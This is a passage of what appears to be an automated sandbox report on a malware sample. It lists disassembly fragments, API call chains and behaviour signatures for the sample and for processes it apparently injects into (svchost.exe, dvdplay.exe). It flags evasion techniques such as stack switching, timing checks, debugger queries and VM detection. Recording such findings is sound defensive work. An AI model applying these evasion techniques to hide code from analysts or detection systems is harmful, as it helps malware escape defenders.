            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041F218 push ss; retf 1_2_0041F29A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041ABD9 push edx; ret 1_2_0041ABDA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00403380 push eax; ret 1_2_00403382
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0042E673 push edi; retf 1_2_0042E679
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00401ECA push ebp; retf 1_2_00401F40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00401EA8 push ebp; retf 1_2_00401F40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041F6B6 push FFFFFF83h; iretd 1_2_0041F6BC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00405FBD pushfd ; iretd 1_2_00405FBF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0340225F pushad ; ret 1_2_034027F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034027FA pushad ; ret 1_2_034027F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034309AD push ecx; mov dword ptr [esp], ecx1_2_034309B6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0340283D push eax; iretd 1_2_03402858
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0340135E push eax; iretd 1_2_03401369
            Source: C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exeCode function: 2_2_032A0B62 push edx; ret 2_2_032A0B63
            Source: C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exeCode function: 2_2_032A5208 push ss; retf 2_2_032A5223
            Source: C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exeCode function: 2_2_03293169 push ebp; retf 2_2_0329317A
            Source: C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exeCode function: 2_2_032A51A1 push ss; retf 2_2_032A5223
            Source: C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exeCode function: 2_2_0329A9EE push edx; retf 2_2_0329A9EF
            Source: C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exeCode function: 2_2_032AB06C push edi; ret 2_2_032AB077
            Source: C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exeCode function: 2_2_032A08F0 push cs; iretd 2_2_032A0900
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exeCode function: 0_2_0047A330 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_0047A330
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exeCode function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00434418
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\dvdplay.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\dvdplay.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\dvdplay.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\dvdplay.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\dvdplay.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Switches to a custom stack to bypass stack traces
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exeAPI/Special instruction interceptor: Address: 2E73244
            Source: C:\Windows\SysWOW64\dvdplay.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
            Source: C:\Windows\SysWOW64\dvdplay.exeAPI/Special instruction interceptor: Address: 7FFE2220D7E4
            Source: C:\Windows\SysWOW64\dvdplay.exeAPI/Special instruction interceptor: Address: 7FFE2220D944
            Source: C:\Windows\SysWOW64\dvdplay.exeAPI/Special instruction interceptor: Address: 7FFE2220D504
            Source: C:\Windows\SysWOW64\dvdplay.exeAPI/Special instruction interceptor: Address: 7FFE2220D544
            Source: C:\Windows\SysWOW64\dvdplay.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
            Source: C:\Windows\SysWOW64\dvdplay.exeAPI/Special instruction interceptor: Address: 7FFE22210154
            Source: C:\Windows\SysWOW64\dvdplay.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0347096E rdtsc 1_2_0347096E
            Source: C:\Windows\SysWOW64\dvdplay.exeWindow / User API: threadDelayed 4226Jump to behavior
            Source: C:\Windows\SysWOW64\dvdplay.exeWindow / User API: threadDelayed 5747Jump to behavior
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-85640
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exeAPI coverage: 3.5 %
            Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
            Source: C:\Windows\SysWOW64\dvdplay.exeAPI coverage: 2.6 %
            Source: C:\Windows\SysWOW64\dvdplay.exe TID: 4340Thread sleep count: 4226 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\dvdplay.exe TID: 4340Thread sleep time: -8452000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\dvdplay.exe TID: 4340Thread sleep count: 5747 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\dvdplay.exe TID: 4340Thread sleep time: -11494000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe TID: 6348Thread sleep time: -55000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe TID: 6348Thread sleep time: -36000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\dvdplay.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\dvdplay.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exeCode function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452492
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exeCode function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442886
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exeCode function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_004788BD
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exeCode function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,0_2_004339B6
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exeCode function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,0_2_0045CAFA
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exeCode function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00431A86
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exeCode function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD27
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exeCode function: 0_2_0045DE8F FindFirstFileW,FindClose,0_2_0045DE8F
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exeCode function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8B
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_00B3C580 FindFirstFileW,FindNextFileW,FindClose,3_2_00B3C580
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exeCode function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary,0_2_0040E500
            Source: dvdplay.exe, 00000003.00000002.3526191845.00000000030FD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllZ
            Source: H1CYDJ8LQe.exe, 00000000.00000002.1681536047.000000000096E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: firefox.exe, 00000008.00000002.2165011209.000002731D35C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll/
            Source: SwTeWVAxKdsP.exe, 00000007.00000002.3526665940.000000000081F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll]
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exeAPI call chain: ExitProcess graph end nodegraph_0-84773
            Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\dvdplay.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0347096E rdtsc 1_2_0347096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004177C3 LdrLoadDll,1_2_004177C3
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exeCode function: 0_2_0045A370 BlockInput,0_2_0045A370
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exeCode function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,0_2_0040D590
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exeCode function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress,0_2_0040EBD0
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exeCode function: 0_2_02E734B0 mov eax, dword ptr fs:[00000030h]0_2_02E734B0
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exeCode function: 0_2_02E73510 mov eax, dword ptr fs:[00000030h]0_2_02E73510
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exeCode function: 0_2_02E71E70 mov eax, dword ptr fs:[00000030h]0_2_02E71E70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B2349 mov eax, dword ptr fs:[00000030h]1_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B2349 mov eax, dword ptr fs:[00000030h]1_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B2349 mov eax, dword ptr fs:[00000030h]1_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B2349 mov eax, dword ptr fs:[00000030h]1_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B2349 mov eax, dword ptr fs:[00000030h]1_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B2349 mov eax, dword ptr fs:[00000030h]1_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B2349 mov eax, dword ptr fs:[00000030h]1_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B2349 mov eax, dword ptr fs:[00000030h]1_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B2349 mov eax, dword ptr fs:[00000030h]1_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B2349 mov eax, dword ptr fs:[00000030h]1_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B2349 mov eax, dword ptr fs:[00000030h]1_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B2349 mov eax, dword ptr fs:[00000030h]1_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B2349 mov eax, dword ptr fs:[00000030h]1_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B2349 mov eax, dword ptr fs:[00000030h]1_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B2349 mov eax, dword ptr fs:[00000030h]1_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B035C mov eax, dword ptr fs:[00000030h]1_2_034B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B035C mov eax, dword ptr fs:[00000030h]1_2_034B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B035C mov eax, dword ptr fs:[00000030h]1_2_034B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B035C mov ecx, dword ptr fs:[00000030h]1_2_034B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B035C mov eax, dword ptr fs:[00000030h]1_2_034B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B035C mov eax, dword ptr fs:[00000030h]1_2_034B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034FA352 mov eax, dword ptr fs:[00000030h]1_2_034FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D8350 mov ecx, dword ptr fs:[00000030h]1_2_034D8350
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0350634F mov eax, dword ptr fs:[00000030h]1_2_0350634F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D437C mov eax, dword ptr fs:[00000030h]1_2_034D437C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346A30B mov eax, dword ptr fs:[00000030h]1_2_0346A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346A30B mov eax, dword ptr fs:[00000030h]1_2_0346A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346A30B mov eax, dword ptr fs:[00000030h]1_2_0346A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342C310 mov ecx, dword ptr fs:[00000030h]1_2_0342C310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03450310 mov ecx, dword ptr fs:[00000030h]1_2_03450310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03508324 mov eax, dword ptr fs:[00000030h]1_2_03508324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03508324 mov ecx, dword ptr fs:[00000030h]1_2_03508324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03508324 mov eax, dword ptr fs:[00000030h]1_2_03508324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03508324 mov eax, dword ptr fs:[00000030h]1_2_03508324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034EC3CD mov eax, dword ptr fs:[00000030h]1_2_034EC3CD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343A3C0 mov eax, dword ptr fs:[00000030h]1_2_0343A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343A3C0 mov eax, dword ptr fs:[00000030h]1_2_0343A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343A3C0 mov eax, dword ptr fs:[00000030h]1_2_0343A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343A3C0 mov eax, dword ptr fs:[00000030h]1_2_0343A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343A3C0 mov eax, dword ptr fs:[00000030h]1_2_0343A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343A3C0 mov eax, dword ptr fs:[00000030h]1_2_0343A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B63C0 mov eax, dword ptr fs:[00000030h]1_2_034B63C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DE3DB mov eax, dword ptr fs:[00000030h]1_2_034DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DE3DB mov eax, dword ptr fs:[00000030h]1_2_034DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DE3DB mov ecx, dword ptr fs:[00000030h]1_2_034DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DE3DB mov eax, dword ptr fs:[00000030h]1_2_034DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D43D4 mov eax, dword ptr fs:[00000030h]1_2_034D43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D43D4 mov eax, dword ptr fs:[00000030h]1_2_034D43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034403E9 mov eax, dword ptr fs:[00000030h]1_2_034403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034403E9 mov eax, dword ptr fs:[00000030h]1_2_034403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034403E9 mov eax, dword ptr fs:[00000030h]1_2_034403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034403E9 mov eax, dword ptr fs:[00000030h]1_2_034403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034403E9 mov eax, dword ptr fs:[00000030h]1_2_034403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034403E9 mov eax, dword ptr fs:[00000030h]1_2_034403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034403E9 mov eax, dword ptr fs:[00000030h]1_2_034403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034403E9 mov eax, dword ptr fs:[00000030h]1_2_034403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344E3F0 mov eax, dword ptr fs:[00000030h]1_2_0344E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344E3F0 mov eax, dword ptr fs:[00000030h]1_2_0344E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344E3F0 mov eax, dword ptr fs:[00000030h]1_2_0344E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034663FF mov eax, dword ptr fs:[00000030h]1_2_034663FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342E388 mov eax, dword ptr fs:[00000030h]1_2_0342E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342E388 mov eax, dword ptr fs:[00000030h]1_2_0342E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342E388 mov eax, dword ptr fs:[00000030h]1_2_0342E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345438F mov eax, dword ptr fs:[00000030h]1_2_0345438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345438F mov eax, dword ptr fs:[00000030h]1_2_0345438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03428397 mov eax, dword ptr fs:[00000030h]1_2_03428397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03428397 mov eax, dword ptr fs:[00000030h]1_2_03428397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03428397 mov eax, dword ptr fs:[00000030h]1_2_03428397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B8243 mov eax, dword ptr fs:[00000030h]1_2_034B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B8243 mov ecx, dword ptr fs:[00000030h]1_2_034B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0350625D mov eax, dword ptr fs:[00000030h]1_2_0350625D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342A250 mov eax, dword ptr fs:[00000030h]1_2_0342A250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03436259 mov eax, dword ptr fs:[00000030h]1_2_03436259
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034EA250 mov eax, dword ptr fs:[00000030h]1_2_034EA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034EA250 mov eax, dword ptr fs:[00000030h]1_2_034EA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03434260 mov eax, dword ptr fs:[00000030h]1_2_03434260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03434260 mov eax, dword ptr fs:[00000030h]1_2_03434260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03434260 mov eax, dword ptr fs:[00000030h]1_2_03434260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342826B mov eax, dword ptr fs:[00000030h]1_2_0342826B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E0274 mov eax, dword ptr fs:[00000030h]1_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E0274 mov eax, dword ptr fs:[00000030h]1_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E0274 mov eax, dword ptr fs:[00000030h]1_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E0274 mov eax, dword ptr fs:[00000030h]1_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E0274 mov eax, dword ptr fs:[00000030h]1_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E0274 mov eax, dword ptr fs:[00000030h]1_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E0274 mov eax, dword ptr fs:[00000030h]1_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E0274 mov eax, dword ptr fs:[00000030h]1_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E0274 mov eax, dword ptr fs:[00000030h]1_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E0274 mov eax, dword ptr fs:[00000030h]1_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E0274 mov eax, dword ptr fs:[00000030h]1_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E0274 mov eax, dword ptr fs:[00000030h]1_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342823B mov eax, dword ptr fs:[00000030h]1_2_0342823B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343A2C3 mov eax, dword ptr fs:[00000030h]1_2_0343A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343A2C3 mov eax, dword ptr fs:[00000030h]1_2_0343A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343A2C3 mov eax, dword ptr fs:[00000030h]1_2_0343A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343A2C3 mov eax, dword ptr fs:[00000030h]1_2_0343A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343A2C3 mov eax, dword ptr fs:[00000030h]1_2_0343A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035062D6 mov eax, dword ptr fs:[00000030h]1_2_035062D6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034402E1 mov eax, dword ptr fs:[00000030h]1_2_034402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034402E1 mov eax, dword ptr fs:[00000030h]1_2_034402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034402E1 mov eax, dword ptr fs:[00000030h]1_2_034402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346E284 mov eax, dword ptr fs:[00000030h]1_2_0346E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346E284 mov eax, dword ptr fs:[00000030h]1_2_0346E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B0283 mov eax, dword ptr fs:[00000030h]1_2_034B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B0283 mov eax, dword ptr fs:[00000030h]1_2_034B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B0283 mov eax, dword ptr fs:[00000030h]1_2_034B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034402A0 mov eax, dword ptr fs:[00000030h]1_2_034402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034402A0 mov eax, dword ptr fs:[00000030h]1_2_034402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C62A0 mov eax, dword ptr fs:[00000030h]1_2_034C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C62A0 mov ecx, dword ptr fs:[00000030h]1_2_034C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C62A0 mov eax, dword ptr fs:[00000030h]1_2_034C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C62A0 mov eax, dword ptr fs:[00000030h]1_2_034C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C62A0 mov eax, dword ptr fs:[00000030h]1_2_034C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C62A0 mov eax, dword ptr fs:[00000030h]1_2_034C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C4144 mov eax, dword ptr fs:[00000030h]1_2_034C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C4144 mov eax, dword ptr fs:[00000030h]1_2_034C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C4144 mov ecx, dword ptr fs:[00000030h]1_2_034C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C4144 mov eax, dword ptr fs:[00000030h]1_2_034C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C4144 mov eax, dword ptr fs:[00000030h]1_2_034C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342C156 mov eax, dword ptr fs:[00000030h]1_2_0342C156
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C8158 mov eax, dword ptr fs:[00000030h]1_2_034C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03436154 mov eax, dword ptr fs:[00000030h]1_2_03436154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03436154 mov eax, dword ptr fs:[00000030h]1_2_03436154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03504164 mov eax, dword ptr fs:[00000030h]1_2_03504164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03504164 mov eax, dword ptr fs:[00000030h]1_2_03504164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DE10E mov eax, dword ptr fs:[00000030h]1_2_034DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DE10E mov ecx, dword ptr fs:[00000030h]1_2_034DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DE10E mov eax, dword ptr fs:[00000030h]1_2_034DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DE10E mov eax, dword ptr fs:[00000030h]1_2_034DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DE10E mov ecx, dword ptr fs:[00000030h]1_2_034DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DE10E mov eax, dword ptr fs:[00000030h]1_2_034DE10E
